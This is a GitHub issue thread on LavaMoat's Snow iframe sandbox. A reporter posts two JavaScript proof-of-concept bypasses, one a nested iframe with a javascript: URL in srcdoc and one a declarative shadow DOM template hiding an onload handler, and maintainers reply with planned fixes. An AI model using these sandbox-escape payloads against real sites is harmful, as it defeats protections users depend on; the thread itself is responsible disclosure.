Closed arxenix closed 1 year ago
Turns out that you don't need a shadow DOM at all for this. Simply:
f = document.createElement('iframe');
f.srcdoc = '<iframe src="javascript:alert(document.domain)"></iframe>';
document.body.appendChild(f);
declarative shadow DOM might be a separate issue though, because you can still use it to prevent snow from stripping onload attributes (#32 ):
f = document.createElement('iframe');
// works for both open and closed shadowroot
f.srcdoc = `
<my-element>
<template id="x" shadowroot="closed">
<b>In Template & ShadowDOM</b>
<iframe onload="this.contentWindow.alert.call(top, top.origin)"></iframe>
</template>
</my-element>
`;
document.body.appendChild(f);
Awesome catch, I honestly have never heard of declarative shadow DOMs before this. For now the solution would be to block declarative shadow DOMs when are injected this way, visit #46 to learn more about this decision.
Regarding your other catch which doesn't involve declarative shadow DOMs at all (which is unrelated to this issue), #48 should fix this.
if disallowing usage of declarative shadow DOMs the way Snow does (https://github.com/LavaMoat/snow/issues/44#issuecomment-1369686014) prevents your application from running correctly, please share so in this issue thread so we can discuss the problem and understand how to best deal with it
You can create a shadowDOM via
<template>
tagshadowroot
attribute in chrome, this is called the declarative shadow DOM: https://web.dev/declarative-shadow-dom/Declarative Shadow DOM is processed and attached when the document is loaded, so we use it in an iframe srcdoc.